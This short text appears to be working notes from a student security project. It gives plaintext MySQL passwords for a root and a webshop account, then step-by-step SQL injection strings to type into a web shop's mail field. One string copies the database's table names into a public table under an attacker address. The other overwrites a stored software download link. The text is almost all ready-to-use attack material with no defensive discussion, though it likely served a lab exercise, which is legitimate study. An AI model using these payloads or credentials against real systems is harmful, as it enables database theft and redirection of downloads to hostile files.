root PW mysql: NetSecProject!
webshop PW mysql: BoredStudents

Step-by-step: commands to insert in mail field
'; insert into software select null, table_name, '', 'attacker@attack.com', 0 from information_schema.tables where table_schema=database(); # 
'; update links2programs set link = 'http://www.google.com' where id=1; # 
